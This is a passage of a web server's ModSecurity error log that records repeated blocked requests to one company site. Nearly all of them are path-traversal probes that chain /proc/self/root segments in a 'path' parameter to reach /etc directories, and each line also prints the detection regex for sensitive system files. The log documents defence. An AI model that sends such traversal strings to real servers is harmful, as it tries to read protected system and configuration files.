"abpKJQkwaGbbGflqUZDR4gAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:45:58.989606 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:49772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKJuoXxyEfFpUF8f8rvgAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:03.935086 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:53480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKK_u8EFLIOrSqIpvFiwAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:46:05.302201 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.243.128:53488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKLUzinOy1jxa1j4fQ7gAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:06.623098 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:53498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKLgkwaGbbGflqUZDR5gAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:27.632497 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.241.31:49984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKQ9Y0UrI5A3LftIxQGwAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:32.048952 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:38748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKSOoXxyEfFpUF8f8r6AAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:51.100826 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:38754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKW0zinOy1jxa1j4fRAAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:54.966857 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.244.43:52618] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpKXgkwaGbbGflqUZDR9gAAAMU"]
[Wed Mar 18 03:46:56.667308 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:33922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKYOyqAr6etmhZHNp3TgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:46:59.476380 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.228.61:56156] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpKY-yqAr6etmhZHNp3UgAAAFI"]
[Wed Mar 18 03:47:45.340470 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:38904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKkUzinOy1jxa1j4fRMAAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:49:22.503782 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:58524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpK8kzinOy1jxa1j4fRogAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:49:24.975801 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:40672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpK9Mdf6f5d65gmYZSPuAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:50:19.786861 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:40674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLK-oXxyEfFpUF8f8siAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:50:52.015298 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:38232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLTPu8EFLIOrSqIpvF6AAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:50:57.118900 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:49548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLUOw_le52K8_3pV2fRgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:51:11.583059 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.241.31:38622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLX_u8EFLIOrSqIpvF9QAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:51:15.199225 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:55640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLY8df6f5d65gmYZSQIAAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:51:28.277902 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:55652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLcMdf6f5d65gmYZSQPgAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:51:55.188656 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:36640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLi-w_le52K8_3pV2fcgAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:52:41.584259 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:46178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLudY0UrI5A3LftIxQ4QAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:52:59.114662 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:45176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpLy-oXxyEfFpUF8f8sugAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:53:14.079187 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:48044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpL2NY0UrI5A3LftIxRJgAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
